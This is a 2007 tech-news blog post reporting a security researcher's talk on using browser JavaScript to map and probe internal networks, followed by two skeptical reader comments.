On MovieTome:
Megan Fox on TRANSFORMERS 2!
Dell Desktop DealsAlpha authors
- Dan Ackerman
- Rich Brown
- David Carnoy
- Bonnie Cha
- Brian Cooley
- Wayne Cunningham
- Robert Dubbin
- Matthew Elliott
- John Falcone
- Jasmine France
- Kent German
- Will Greenwald
- Lori Grunin
- Justin Jaffe
- David Katzmaier
- James Kim
- Nicole Lee
- Lara Luepke
- Kevin Massy
- Tom Merritt
- Tim Moynihan
- Rafe Needleman
- David Rudden
- Philip Ryan
- Michelle Thatcher
- Robert Vamosi
- Elsa Wenzel
- Molly Wood
- Felisa Yang
February 06, 2007, 5:50 PM PST
Hacking Intranet Web sites from the outside Posted by: Robert Vamosi
Jeremiah Grossman, CTO of White Security, presented a talk about attacking Intranet networks, the networks inside an enterprise or home. He did not use Ajax, a Web 2.0 technology that lends itself to special kinds of abuse, but pure JavaScript. In several live demonstrations, Grossman showed how it was possible, by appending the URL in a victim's browser with a call to remotely hosted JavaScript to see a victim's browser history or learn an internal IP address. With such information, he was then able to scan the internal network and locate any valid servers operating inside the corporate firewall. He showed how an attacker could mask all this by creating a simple iframe over the legitimate browser screen, so the victim could use the browser to surf the Net, unaware that JavaScript was running in the background. For fun, the attacker could send messages to the victim that would appear as alert dialog boxes. Cross site scripting is not new; Billy Hoffman talked about these kinds of attacks at last summer's Black Hat Briefings. What is new is the ability to hack into someone's internal network via unlikely sources, such as a Web-enabled printer, or even a Web-enabled UPS strip. Grossman recommends that users be suspicious of long URLs and when in doubt type it out. Further, he points out that since there is no malware associated with these attacks, antivirus and other software solutions won't work. He uses a secure browser, like Firefox, and adds there are plug-ins such as the Netcraft toolbar and the NoScript extension which can further block these attacks. A more drastic approach would be to disable Java, JavSscript, and ActiveX, but doing so could reduce the functionality on some Web sites.
- Read also: security, Web 2.0, RSA conference
- Email to a friend | Print this post
TalkBack
2 messages
Home-based Hacking demo!
Yippee! The incredibly brilliant fellows at White Hat have shown us all yet another weakness in the computing infrastructure. All the hours they've invested to "Discover" this weakness not only helps consumers become more secure (...not really) and bolsters White Hats business prospects, it gives the bad guys/gals another exploitation tip (absolutely)! Yes, I'm a cynic.
I recall reading many years ago about how John McAfee must be writing all the new viruses to support the sale of their anti-virus products too. All these so-called demos are nothing but marketing hype for these security vendors.
If criminals published their tips and secrets for fraud and phishing we'd be outraged. Yet, when the so-called good guys are actively working to identify new ways they can break into our networks, who are the helping? You never read about how to secure with white listing do you? Define what's allowed and eliminate the rest? In other words, put controls in-place. Don't introduce new technology and features willie-nillie. Keeping Internet activity to well-know use and don't veer off into the dark netherworld areas, so alluring they may be, and reduce risks ten fold.
Seriously, how many home users do you think will be helped as compared to hackers and by extension the whitey hatters? Consumers 0 Hackers and WH 10! Yippee. Chaulk another up for the good guys!
I recall reading many years ago about how John McAfee must be writing all the new viruses to support the sale of their anti-virus products too. All these so-called demos are nothing but marketing hype for these security vendors.
If criminals published their tips and secrets for fraud and phishing we'd be outraged. Yet, when the so-called good guys are actively working to identify new ways they can break into our networks, who are the helping? You never read about how to secure with white listing do you? Define what's allowed and eliminate the rest? In other words, put controls in-place. Don't introduce new technology and features willie-nillie. Keeping Internet activity to well-know use and don't veer off into the dark netherworld areas, so alluring they may be, and reduce risks ten fold.
Seriously, how many home users do you think will be helped as compared to hackers and by extension the whitey hatters? Consumers 0 Hackers and WH 10! Yippee. Chaulk another up for the good guys!
by Schratboy (See profile) - February 8, 2007 7:39 AM PST
Re: Hacking Intranet Web sites from the outside
Without having actually been there for the presentation, it is a bit difficult to respond directly to the ramifications of this "new" discovery. Printers, UPSs and a host of other devices that are configured to be "remotely" managed have always been a rather weak link in the security stance of homes, small business and yes, corporations.
So I suppose what I am trying to ask is; and.....? What's new with this info?
So I suppose what I am trying to ask is; and.....? What's new with this info?
by Inetsec (See profile) - February 7, 2007 2:37 PM PST
